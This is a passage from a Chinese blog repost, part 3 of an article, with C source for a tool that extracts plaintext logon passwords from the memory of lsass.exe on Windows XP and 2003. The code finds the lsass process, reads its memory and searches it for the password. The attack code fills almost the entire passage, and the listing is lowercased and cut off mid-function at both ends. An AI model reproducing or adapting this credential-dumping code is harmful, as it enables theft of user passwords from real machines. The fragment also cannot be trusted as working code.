XP 和2003的Lsass进程中明文密码[3]

[入库:2005年8月18日] [更新:2007年3月24日]

本文简介:选自 kernet 的 blog

nbsp;                break;
                    }
                }
                return i + 7;        // one flag to indicate we find the password
            }
        }
    }
    return -1;        // well,we fail to find the password,and this always happens
}
// end search

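//------------------------------------------------------------------------------------
// purpose: to get the lsass.exe pid by walking a Toolhelp process snapshot
// return type: dword  -> pid of the first process whose image name is "lsass.exe",
//                        or 0 when the snapshot cannot be created/enumerated or no
//                        such process exists (the two cases are indistinguishable
//                        to the caller; 0 is never a valid user-process pid)
// parameters:  none
// note: the listing appears to have been lowercased by the host site; dword/handle/
//       createtoolhelp32snapshot etc. correspond to the Win32 DWORD/HANDLE/
//       CreateToolhelp32Snapshot names.
//------------------------------------------------------------------------------------
dword getlsasspid()
{
    handle         hprocesssnap;
    processentry32 pe32;
    dword          pid = 0;        // 0 doubles as the error / not-found result

    // snapshot of every process on the system
    hprocesssnap = createtoolhelp32snapshot(th32cs_snapprocess, 0);
    if( hprocesssnap == invalid_handle_value )
    {
        printf("fail to create snap shot\n");
        return 0;
    }

    // Toolhelp requires dwsize to be filled in before the first process32first call
    pe32.dwsize = sizeof(processentry32);

    if( !process32first(hprocesssnap, &pe32))
    {
        closehandle(hprocesssnap);     // must clean up the snapshot object!
        return 0;
    }

    // strcmpi is the Microsoft CRT case-insensitive compare (POSIX: strcasecmp).
    // NOTE(review): this is a name match only -- any process can be called lsass.exe,
    // so the returned pid is not a trustworthy identity of the real LSA process.
    do
    {
        if (strcmpi(pe32.szexefile,"lsass.exe") == 0)
        {
            pid = pe32.th32processid;
            break;        // first match wins
        }
    }while(process32next( hprocesssnap, &pe32));

    closehandle( hprocesssnap);     // released on every path after creation
    return pid;
}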
// end getlsasspid()

//------------------------------------------------------------------------------------
// purpose: to find the password
// return type: boolean
// parameters:  
//           in: dword pid        ->        the lsass.exe's pid
//------------------------------------------------------------------------------------
bool findpassword(dword pid)
{
    handle hprocess = null;
    char   buffer[5 * 1024] = {0};
    dword  byteget = 0;
    int    found = -1;

    hprocess = openprocess(process_vm_read,false,pid);        // open process
    if (hprocess == null)
    {
        printf("fail to open process\n");
        return false;
    }

    if (!readprocessmemory(hprocess,(pvoid)baseaddress,buffer,5 * 1024,&byteget))        // read the memory from lsass.exe
    {
        printf("fail to read memory\n");
        closehandle(hprocess);
        return false;
    }

    closehandle(hprocess);

    found = search(buffer,byteget);        // search the password
    if (found >= 0)        // we may find the password
    {
        if (strlen(password) > 0)     &

本文关键:XP 和2003的Lsass进程中明文密码